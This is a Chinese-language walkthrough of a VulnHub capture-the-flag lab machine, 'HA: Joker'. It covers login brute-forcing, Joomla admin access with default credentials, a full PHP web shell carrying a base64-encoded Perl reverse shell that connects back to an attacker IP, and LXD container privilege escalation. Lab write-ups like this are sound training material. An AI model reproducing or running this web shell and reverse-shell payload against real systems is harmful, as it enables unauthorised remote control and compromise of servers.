vulnhub靶机测试-HA: Joker
靶机地址:https://www.vulnhub.com/entry/ha-joker,379/
靶机导入虚拟机设置为NAT
首先找到靶机ip
Ok,找到靶机ip
盲猜下端口8080:
抓包看看,base64。
进行爆破
登录进来是这样的
用刚才的密码登录不了,看下源码
是joomla的
百度了一下默认的后台:
Joomla默认密码进入后台:
在模板的 index.php中写入shell
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.124.134";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $192.168.124.134 $4444 &");
?>
Kali监听4444端口访问index.php,反弹shell成功
提权操作
这里使用LXD 来提升权限
用github上的脚本来生成
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
运行“build-alpine”脚本后会生成一个tar.gz文件
我们需要将文件传到靶机上,或者让靶机下载文件。
这里我们在文件目录下使用 python -m SimpleHTTPServer 快速搭建http服务
然后靶机先切换到根目录,然后用wget下载该文件
但这里提示我们没有权限,我们选择在tmp目录下下载
wget http://192.168.124.134:8000/alpine-v3.10-x86_64-20191201_0106.tar.gz
然后将镜像添加到 lxs
lxc image import ./alpine-v3.10-x86_64-20191201_0106.tar.gz --alias ying
依次运行命令
lxc init ying ignite -c security.privileged=true
lxc config device add ignite ying disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
进入到/mnt/root就可以看到靶机所有文件了
最后/mnt/root/root 中有一个final.txt文件
至此靶机渗透结束